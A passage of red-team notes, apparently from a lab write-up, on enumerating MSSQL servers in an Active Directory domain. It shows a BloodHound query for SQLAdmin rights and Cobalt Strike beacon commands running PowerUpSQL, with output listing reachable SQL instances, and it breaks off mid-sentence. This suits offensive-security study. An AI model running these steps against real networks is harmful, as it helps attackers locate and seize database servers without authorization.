Microsoft SQL (MSSQL) is a database management system similar to MySQL, but on Windows hosts.
We can abuse MSSQL if we can control the SQL server or if we have access to a SQL server with a link to a different MSSQL server.
We can query bloodhound to find users that can control MSSQL server by using the cyper:
MATCH p=(u:User)-[:SQLAdmin]->(c:Computer) RETURN p
Or we can also look for OU/Groups with sql in the name.
Once we know using what user we can control the MSSQL server, and we have access to the user, we can use the tool PowerUpSQL to test the connection
beacon> powershell-import /opt/PowerUpSQL/PowerUpSQL.ps1
[*] Tasked beacon to import: /opt/PowerUpSQL/PowerUpSQL.ps1
[+] host called home, sent: 201904 bytes
beacon> powershell Get-SQLInstanceDomain | Get-SQLConnectionTest
[*] Tasked beacon to run: Get-SQLInstanceDomain | Get-SQLConnectionTest
[+] host called home, sent: 393 bytes
[+] received output:
#< CLIXML
ComputerName Instance Status
------------ -------- ------
sql01.rastalabs.local sql01.rastalabs.local,1433 Accessible
sql01.rastalabs.local sql01.rastalabs.local Accessible
sql02.rastalabs.local sql02.rastalabs.local,1433 Not Accessible
sql02.rastalabs.local sql02.rastalabs.local Not Accessible
Link: https://github.com/mlcsec/SharpSQL
SharpSQL.exe Get-SQLInstanceDomain
Using PowerUpSQL we can test our access to the server by running a query on the database: